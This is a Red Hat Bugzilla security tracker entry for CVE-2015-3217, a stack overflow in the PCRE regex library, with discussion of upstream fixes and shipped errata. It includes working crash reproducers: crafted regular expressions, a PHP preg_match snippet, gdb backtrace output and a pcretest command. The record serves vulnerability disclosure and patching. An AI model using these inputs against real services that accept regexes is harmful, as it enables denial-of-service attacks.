Bug 1228283 – CVE-2015-3217 pcre: stack overflow caused by mishandled group empty match (8.38/11)

Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.

Bug 1228283 - (CVE-2015-3217) CVE-2015-3217 pcre: stack overflow caused by mishandled group empty match (8.38/11)

Summary:	CVE-2015-3217 pcre: stack overflow caused by mishandled group empty match (8....

Status:	NEW

Aliases:	CVE-2015-3217

Product:	Security Response
Classification:	Other
Component:	vulnerability (Show other bugs)
Sub Component:
Version:	unspecified
Hardware:	All Linux

Priority	medium Severity medium
Target Milestone:	---
Target Release:	---
Assigned To:	Red Hat Product Security
QA Contact:
Docs Contact:

URL:
Whiteboard:	impact=moderate,public=20150603,repor...
Keywords:	Reopened, Security

Depends On:	1330455 1330456 1330508 1330509
Blocks:	1226929 1287727
	Show dependency tree / graph

Reported:	2015-06-04 10:31 EDT by Vasyl Kaigorodov
Modified:	2016-11-23 09:09 EST (History)
CC List:	13 users (show)

See Also:
Fixed In Version:	pcre 8.38
Doc Type:	Bug Fix
Doc Text:
Story Points:	---
Clone Of:
Environment:
Last Closed:	2015-07-03 12:35:26 EDT
Type:	---
Regression:	---
Mount Type:	---
Documentation:	---
CRM:
Verified Versions:
Category:	---
oVirt Team:	---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team:	---

Attachments	(Terms of Use)
Add an attachment (proposed patch, testcase, etc.)

External Trackers
Tracker	ID	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2016:1025	normal	SHIPPED_LIVE	Important: pcre security update	2016-05-11 13:07:01 EDT
Red Hat Product Errata	RHSA-2016:1132	normal	SHIPPED_LIVE	Important: rh-mariadb100-mariadb security update	2016-05-26 08:35:06 EDT
Red Hat Product Errata	RHSA-2016:2750	normal	SHIPPED_LIVE	Moderate: rh-php56 security, bug fix, and enhancement update	2016-11-15 11:40:02 EST

Groups: None (edit)

Description Vasyl Kaigorodov 2015-06-04 10:31:28 EDT

Stack buffer overflow was reported in PCRE library.
Original report:
"""
Latest version of PCRE is prone to a Stack Overflow vulnerability which could caused by the following regular expression.

/^(?:(?(1)\\.|([^\\\\W_])?)+)+$/

To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be triggered by following code snippet.

<?php
preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr);
?>

Other versions and applications may also be affected.

Following test is conveyed under Kali Linux (based on Debian x64) with php 5.6.9:
==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439          RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0  0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1  0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=<optimized out>, eptrb=0x0, rdepth=11129)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2  0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3  0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4  0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5  0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=<optimized out>, eptrb=0x0, rdepth=11125)
"""

Upstream bug: https://bugs.exim.org/show_bug.cgi?id=1638
Upstream commits:

    http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1560&r2=1562&pathrev=1562
    http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1559&r2=1560&pathrev=1562
(I'm not sure which one fixes the issue exactly though)

Steps to reproduce could be found in the flaw description above.

Comment 1 Kurt Seifried 2015-07-03 12:35:26 EDT

Statement:

(none)

Comment 2 Tomas Hoger 2016-02-23 07:06:24 EST

(In reply to Vasyl Kaigorodov from comment #0)
> Upstream commits:
> http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1560&r2=1562&pathrev=1562
> http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1559&r2=1560&pathrev=1562
> (I'm not sure which one fixes the issue exactly though)

Neither of the above, the upstream fix is:

http://vcs.pcre.org/pcre?view=revision&revision=1566

Confirmed the issue in Red Hat Enterprise Linux 7 (pcre 8.32) and Red Hat Enterprise Linux 6 (pcre 7.8), not reproducible in Red Hat Enterprise Linux 5 (pcre 6.6).

Reproducer, as noted in the upstream bug:

/^(?:(?(1)x|)+)+$()/

Not easily reproducible with glib2 embedded pcre, as pcre in glib2 is built with MATCH_LIMIT_RECURSION=8192 with limits the number of recursive match() calls.  Issue can be reproduced when using smaller stack (ulimit -s).

Comment 7 Petr Pisar 2016-04-28 09:09:36 EDT

Please note that successful reproducer requires non-empty data to match on. E.g.:

$ printf '%s\n%s\n' '/^(?:(?(1)x|)+)+$()/' 'abcd' | libtool --mode=execute valgrind ./pcretest

Comment 8 errata-xmlrpc 2016-05-11 09:07:15 EDT

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:1025 https://rhn.redhat.com/errata/RHSA-2016-1025.html

Comment 9 errata-xmlrpc 2016-05-26 04:38:24 EDT

This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7.1 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7.2 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7
  Red Hat Software Collections for Red Hat Enterprise Linux 6.6 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 6
  Red Hat Software Collections for Red Hat Enterprise Linux 6.7 EUS

Via RHSA-2016:1132 https://access.redhat.com/errata/RHSA-2016:1132

Comment 10 errata-xmlrpc 2016-11-15 06:46:41 EST

This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 6
  Red Hat Software Collections for Red Hat Enterprise Linux 6.7 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7
  Red Hat Software Collections for Red Hat Enterprise Linux 7.2 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7.3 EUS

Via RHSA-2016:2750 https://rhn.redhat.com/errata/RHSA-2016-2750.html

Note You need to log in before you can comment on or make changes to this bug.